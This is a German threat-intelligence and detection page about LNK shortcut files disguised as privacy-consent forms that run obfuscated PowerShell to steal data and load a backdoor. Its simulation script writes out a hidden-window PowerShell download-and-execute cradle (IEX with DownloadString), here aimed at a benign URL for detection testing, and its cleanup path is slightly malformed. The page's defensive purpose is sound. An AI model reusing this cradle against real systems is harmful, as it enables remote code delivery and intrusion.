SOC Prime Bias: Hoch

19 Jun 2026 07:26 UTC

Was steckte wirklich in der Verknüpfungsdatei, die als Datenschutzerklärungsformular getarnt war?

Author Photo
SOC Prime Team linkedin icon Folgen
Was steckte wirklich in der Verknüpfungsdatei, die als Datenschutzerklärungsformular getarnt war?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure verteilen bösartige LNK-Dateien, die als Datenschutzerklärungsformulare getarnt sind, um Benutzer dazu zu verleiten, sie zu öffnen. Bei Ausführung starten diese Verknüpfungsdateien verschleierte PowerShell-Befehle, die zusätzliche Nutzdaten mithilfe von fileless-Techniken abrufen und ausführen. Die Angriffskette ist darauf ausgelegt, Informationen zu stehlen und einen Backdoor-Loader bereitzustellen, der den Zugang und die Persistenz aufrecht erhält.

Untersuchung

Die Untersuchung ergab, dass die LNK-Dateien verschleierten PowerShell-Code einbetten, der für das Herunterladen von Folge-Skripten verantwortlich ist. Diese sekundären Skripte umfassen einen Downloader, der Nutzdaten von legitimen Webdiensten abruft, und einen Loader, der sie direkt im Speicher ausführt. Der Bedrohungsakteur missbraucht auch den Windows Task Scheduler für Persistenz und verwendet Täuschungsdokumente, um die bösartigen Aktivitäten legitim erscheinen zu lassen.

Minderung

Organisationen sollten eine strikte Überprüfung von Dateierweiterungen durchsetzen und Benutzer über LNK-Dateien, die als normale Dokumente getarnt sind, warnen. Sicherheitsteams sollten die Aktivität des Task Schedulers, PowerShell-Ausführungsprotokolle und ausgehende Netzwerkverbindungen genau überwachen. Benutzer sollten auch geschult werden, sowohl den Absender als auch den Zustellungsweg jeder eingehenden Datei vor dem Öffnen zu überprüfen.

Reaktion

Wenn diese Aktivität erkannt wird, sollten Administratoren sofort verdächtige Task-Scheduler-Einträge und ungewöhnliche PowerShell-Skript-Erstellungen in benutzerzugänglichen Verzeichnissen überprüfen. PowerShell-Protokolle sollten analysiert und externe Verbindungen verfolgt werden, insbesondere solche, die legitime Cloud-Plattformen oder Web-Speicherdienste einbeziehen. Eine vollständige forensische Untersuchung sollte dann bei allen identifizierten bösartigen Skripten und unautorisiertem Netzwerkverkehr durchgeführt werden.

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien Pre-flight Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennung erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer versucht, ersten Zugang zu etablieren und eine Malware-Nutzlast der zweiten Stufe herunterzuladen. Um eine Erkennung durch einfache Dateiscanner zu vermeiden, verwenden sie eine LNK (Verknüpfungs-) Datei. Diese LNK-Datei ist so gestaltet, dass powershell.exe in einem versteckten Fenster ausgeführt wird. Der an PowerShell übergebene Befehl verwendet Invoke-Expression and DownloadString um ein Skript von einer entfernten URL abzurufen. Dies ahmt realistische „Living-off-the-Land“ (LotL) Angriffe nach, bei denen legitime Binärdateien verwendet werden, um bösartige Aktionen durchzuführen, mit dem Ziel, traditionelle signaturbasierte Antivirenprogramme zu umgehen.

  • Regressionstest-Skript:

    # 1. Definieren Sie die Ziel-URL (unter Verwendung einer gutartigen Seite zum Testen)
    $url = "https://www.google.com"
    
    # 2. Erstellen Sie die bösartige PowerShell-Nutzdatenzeichenfolge
    # Diese Zeichenfolge ist so konzipiert, dass sie die Erkennung von 'DownloadString' und 'Invoke-Expression' auslöst
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Erstellen eines Dummy-LNK-Dateiinhalts (simuliert)
    # Bei einem echten Angriff wäre dies eine binäre .lnk Datei.
    # Hier führen wir den Befehl direkt aus, um sicherzustellen, dass das SkriptBlock-Log zur Validierung generiert wird.
    Write-Host "[+] Simulierte bösartige PowerShell-Ausführung über LNK-Nutzdaten..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Simulationsbefehl ausgeführt. Überprüfen Sie die Ereignis-ID 4104."
  • Säuberungsbefehle:

    # Entfernen Sie alle Artefakte, falls Dateien erstellt wurden
    Remove-Item -Path "$HOMEDesktopSimuliertes_Bösartiges_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Reinigung abgeschlossen."